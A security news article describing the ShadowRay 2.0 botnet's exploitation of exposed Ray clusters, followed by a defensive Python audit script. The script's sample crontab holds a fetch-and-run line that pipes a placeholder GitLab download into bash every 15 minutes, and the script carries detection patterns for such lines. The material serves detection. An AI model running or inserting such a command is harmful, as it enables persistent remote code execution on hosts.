ShadowRay 2.0 Exploits Ray Vulnerability to Create Global GPU Mining Botnet
Cybersecurity firm Oligo Security has issued a stark warning about ongoing cyberattacks that are turning vulnerable Ray AI clusters into a self-spreading cryptocurrency mining botnet. This malicious operation, dubbed “ShadowRay 2.0,” represents an escalation of an earlier wave of attacks seen between late 2023 and early 2024. The fundamental weakness being exploited is an unauthenticated access vulnerability (specifically CVE-2023-48022, scoring a critical 9.8 out of 10) in the Ray open-source framework, allowing attackers to seize control of compromised systems and steal their processing power, particularly from those equipped with powerful NVIDIA GPUs, for illicit mining of cryptocurrency using the XMRig software.
The Core of the Problem: A Design Flaw and Exposed Systems
The persistent nature of this vulnerability stems from a fundamental design choice within Ray. The developers intended the framework to operate exclusively within a secure, isolated network and to only process code from trusted sources. Because of this, the framework was not built with strong internal authentication mechanisms. Unfortunately, many users have ignored this best practice, leaving their Ray servers directly exposed to the public internet. This accidental exposure has created a massive and easily exploitable target pool for cybercriminals, with over 230,500 Ray servers currently accessible online. This massive surface area is a goldmine for attackers, as it offers a vast array of high-powered computing resources.
How the ShadowRay 2.0 Worm Spreads
The ShadowRay 2.0 campaign operates as a computer worm, designed to spread automatically from one victim to the next. The attack begins by submitting a malicious job to the exposed Ray Job Submission API (the /api/jobs/ endpoint on the dashboard). These jobs contain complex, multi-stage scripts written in Bash and Python that first perform system checks. Once a cluster is compromised, the attackers leverage Ray's own orchestration capabilities, the very features designed to manage distributed tasks, to launch a spray-and-pray attack. In other words, the compromised clusters are weaponized to seek out and infect other unsecured Ray dashboards, creating a self-replicating infection chain that expands the botnet autonomously across the globe.
The attackers have utilized services like GitLab and GitHub to host and deliver their malicious payloads, using seemingly innocuous repository names like “ironern440-group” and “thisisforwork440-ops” to hide in plain sight. Although these accounts have been shut down, the attackers have shown remarkable persistence and a quick ability to adapt, immediately creating new accounts to resume their operation. This speed highlights the dedication of the threat actors behind this sophisticated campaign.
Covert Tactics and Global Reach
Once a system is infected, the malware utilizes the platform’s features to move laterally within the network, even reaching non-internet-facing nodes. It also creates reverse shells, essentially a secret communication link back to the attacker’s command-and-control infrastructure, allowing for remote takeover. To ensure the infection is permanent, a cron job is set up to automatically re-download the latest version of the malware from GitLab every 15 minutes, guaranteeing persistence on the host machine.
Researchers believe that the sophisticated structure, comments, and error-handling code within the GitLab payloads suggest the criminals may have used large language models (LLMs) to help craft the malicious scripts. The malware is also designed to be highly stealthy. It attempts to remain undetected by limiting its CPU usage to about 60% and disguising its processes to look like legitimate Linux kernel worker services. Furthermore, the malware contains a function to check if the infected machine is located in China and will deploy a version of the malware specific to that region. In a bid to maximize their profits, the botnet also scans for and terminates any competing cryptocurrency mining software running on the host, a common tactic in cryptojacking operations.
Evolving into a Multi-Purpose Botnet
The threat has expanded beyond simple cryptocurrency theft. Oligo Security observed that the attackers deployed Sockstress, a tool that exhausts a server's TCP connection state, against production websites. This indicates that the compromised Ray clusters are now being used for distributed denial-of-service (DDoS) attacks, turning the operation into a multi-purpose botnet. The target port for these attacks, 3333, is commonly associated with mining pools, suggesting that the criminals are using their new DDoS capability against rival mining infrastructure to eliminate competition. The ability to rent out or use DDoS capacity creates a second major revenue stream for the attackers beyond pure cryptojacking.
Mitigation and Defense Strategies
Anyscale, the original developer of the Ray framework, has responded by releasing a “Ray Open Ports Checker” tool. This tool allows users to verify that their clusters are correctly configured and not accidentally exposed online. For users, the primary defense strategies are to immediately configure firewall rules to block all unauthorized external access and to implement additional authorization on the default Ray Dashboard port (which is 8265). The critical takeaway is that while Ray is an immensely powerful tool for AI and distributed computing, users must strictly adhere to the security best practices and ensure the framework is never directly accessible from the public internet.
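As an added, constructed illustration (not Anyscale's Ray Open Ports Checker and not code from Oligo's report), the script below audits a host for the two conditions this article ties to ShadowRay 2.0: the Ray dashboard port 8265 listening on a non-loopback interface, and a cron entry that re-fetches a payload from GitLab or GitHub every 15 minutes and pipes it into a shell. The `ss` output and crontab lines are constructed samples; the repository URL is a placeholder.

```python
"""Host-side audit for the two ShadowRay 2.0 artifacts described above:
a Ray dashboard (port 8265) bound to a public interface, and a cron job
that re-downloads a GitLab/GitHub payload every 15 minutes.
Sample inputs are constructed; for live use feed in `ss -ltnH` and `crontab -l`."""
import shlex

RAY_DASHBOARD_PORT = 8265
# Constructed `ss -ltnH` output: one public bind, one loopback bind, one IPv6 bind.
SAMPLE_SS = """LISTEN 0 128 0.0.0.0:8265 0.0.0.0:*
LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
LISTEN 0 4096 [::]:22 [::]:*"""

# Constructed crontab: one benign entry, one matching the reported persistence loop
# (placeholder repository path, not a real indicator).
SAMPLE_CRONTAB = """0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/15 * * * * curl -fsSL https://gitlab.com/EXAMPLE-GROUP/EXAMPLE/-/raw/main/x.sh | bash"""

FETCH_TOOLS = {"curl", "wget"}
REPO_HOSTS = ("gitlab.com", "github.com")


def exposed_binds(ss_output: str, port: int = RAY_DASHBOARD_PORT) -> list:
    """Return local address:port strings where `port` listens on a non-loopback address."""
    hits = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[3].endswith(f":{port}"):
            continue
        addr = fields[3].rsplit(":", 1)[0]
        if addr not in ("127.0.0.1", "[::1]"):
            hits.append(fields[3])
    return hits


def suspicious_cron(crontab: str) -> list:
    """Flag cron lines that run at least every 15 minutes and pipe a
    GitLab/GitHub download straight into sh or bash."""
    hits = []
    for line in crontab.splitlines():
        parts = line.strip().split(None, 5)
        if len(parts) < 6 or parts[0].startswith("#"):
            continue
        minute, command = parts[0], parts[5]
        step = minute[2:] if minute.startswith("*/") else ""
        frequent = minute == "*" or (step.isdigit() and int(step) <= 15)
        tokens = shlex.split(command)
        fetches_repo = bool(FETCH_TOOLS & set(tokens)) and any(h in command for h in REPO_HOSTS)
        piped_to_shell = "|" in tokens and tokens[-1] in ("sh", "bash")
        if frequent and fetches_repo and piped_to_shell:
            hits.append(line.strip())
    return hits
```

A non-empty result from either function is a finding to act on: restrict the dashboard bind address or firewall port 8265, and remove the cron entry before the next 15-minute refetch.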
